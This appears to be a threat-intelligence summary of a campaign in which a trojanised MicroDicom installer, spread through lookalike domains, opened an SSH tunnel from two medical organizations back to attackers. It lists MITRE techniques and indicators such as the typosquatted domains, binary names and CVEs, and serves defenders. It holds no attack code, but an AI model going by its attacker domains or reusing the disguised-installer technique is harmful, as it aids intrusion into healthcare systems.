Two medical organizations were tricked into downloading a malicious DICOM viewer installer. Huntress SOC detected an SSH connection back to the attackers via the malicious installer, which was a clone of the legitimate MicroDicom website. The incident underscores the importance of vigilance and verification when downloading software, even from seemingly trustworthy sources. #MicroDicom #mlcrodlcom.info #macrodicom.info #mLcrodLcom.info #UpdaterSvc.exe #OpenSSH #7655.bat #CVE-2024-33606 #CVE-2024-28877
Keypoints
- Two medical organizations downloaded a malicious DICOM viewer installer.
- The Huntress SOC detected suspicious SSH activity linked to the installer.
- The malicious installer was 178 MB, significantly larger than the legitimate 13 MB version.
- Attackers cloned the legitimate MicroDicom website to distribute the malicious software.
- The malicious installer included an updater that created a secret SSH connection back to the attackers.
- Huntress analysts confirmed the malicious version contained OpenSSH and another binary responsible for initiating the malicious behavior.
- The incident highlights the need for caution and verification when downloading software.
MITRE Techniques
- [T1071.001] Application Layer Protocol – The malicious installer used SSH tunneling to connect to an external IP address. ‘The malicious installer used SSH tunneling to connect to an external IP address.’
- [T1203] Execution – The malicious installer exploited vulnerabilities to execute malicious code. ‘Exploitation for Client Execution: The malicious installer exploited vulnerabilities to execute malicious code.’
- [T1543.003] Persistence – The malicious UpdaterSvc.exe service was registered to maintain persistence. ‘Create or Modify System Process: The malicious UpdaterSvc.exe service was registered to maintain persistence.’
- [T1071.001] Command and Control – The SSH tunnel established a command and control channel for the attackers. ‘Application Layer Protocol: The SSH tunnel established a command and control channel for the attackers.’
- [T1041] Exfiltration – The SSH tunnel could be used for exfiltrating sensitive information. ‘Exfiltration Over Command and Control Channel: The SSH tunnel could be used for exfiltrating sensitive information.’
Indicators of Compromise
- [Domain] Domains used to host and distribute the malicious installer – mLcrodLcom.info, macrodicom.info, mLcrodicom.info, microdLcom.info
- [File] Malicious binaries used by the installer – UpdaterSvc.exe, 7655.bat
- [Software] OpenSSH embedded in the malicious package – OpenSSH
- [Certificate] Code signing certificate from Helping Businesses Limited – Helping Businesses Limited
- [URL] Hosting/distribution resource – an Amazon S3 bucket hosting the malicious binary
- [Vulnerability] CVEs tied to the advisories – CVE-2024-33606, CVE-2024-28877
- [Advisory] CISA ICSMA-24-163-01